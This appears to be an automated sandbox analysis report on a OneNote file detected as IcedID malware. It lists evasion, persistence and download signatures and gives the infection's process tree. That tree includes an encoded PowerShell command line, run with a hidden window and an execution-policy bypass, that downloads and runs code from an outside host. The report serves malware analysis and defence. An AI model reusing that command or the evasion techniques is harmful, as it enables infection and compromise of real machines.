Windows
Analysis Report
Inv_02_02_#6.one
Overview
General Information
Detection
IcedID
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Yara detected Malicious OneNote
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Yara detected Powershell download and execute
Snort IDS alert for network traffic
Yara detected IcedID
PowerShell case anomaly found
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Suspicious powershell command line found
Powershell drops PE file
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Creates a start menu entry (Start Menu\Programs\Startup)
Found large amount of non-executed APIs
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
ONENOTE.EXE (PID: 1972 cmdline:
C:\Program Files (x8 6)\Microso ft Office\ Office16\O NENOTE.EXE " "C:\User s\user\Des ktop\Inv_0 2_02_#6.on e MD5: 8D7E99CB358318E1F38803C9E6B67867) ONENOTEM.EXE (PID: 2040 cmdline:
/tsr MD5: DBCFA6F25577339B877D2305CAD3DEC3)
mshta.exe (PID: 2100 cmdline:
"C:\Window s\SysWOW64 \mshta.exe " "C:\User s\user\App Data\Local \Temp\Open .hta" {1E4 60BD7-F1C3 -4B2E-88BF -4E770A288 AF5}{1E460 BD7-F1C3-4 B2E-88BF-4 E770A288AF 5} MD5: 7083239CE743FDB68DFC933B7308E80A) cmd.exe (PID: 1784 cmdline:
"C:\Window s\System32 \cmd.exe" /c powErsh Ell -nop - w hiddEn - Ep bypass -Enc SQBFA FgAIAAoAE4 AZQB3AC0AT wBiAGoAZQB jAHQAIABOA GUAdAAuAFc AZQBiAGMAb ABpAGUAbgB 0ACkALgBkA G8AdwBuAGw AbwBhAGQAc wB0AHIAaQB uAGcAKAAiA GgAdAB0AHA AOgAvAC8AY wBvAHIAcwB hAG4AYQB2A GUALgB0AG8 AcAAvAGcAY QB0AGUAZgA uAHAAaABwA CIAKQA= MD5: F3BDBE3BB6F734E357235F4D5898582D) conhost.exe (PID: 3000 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)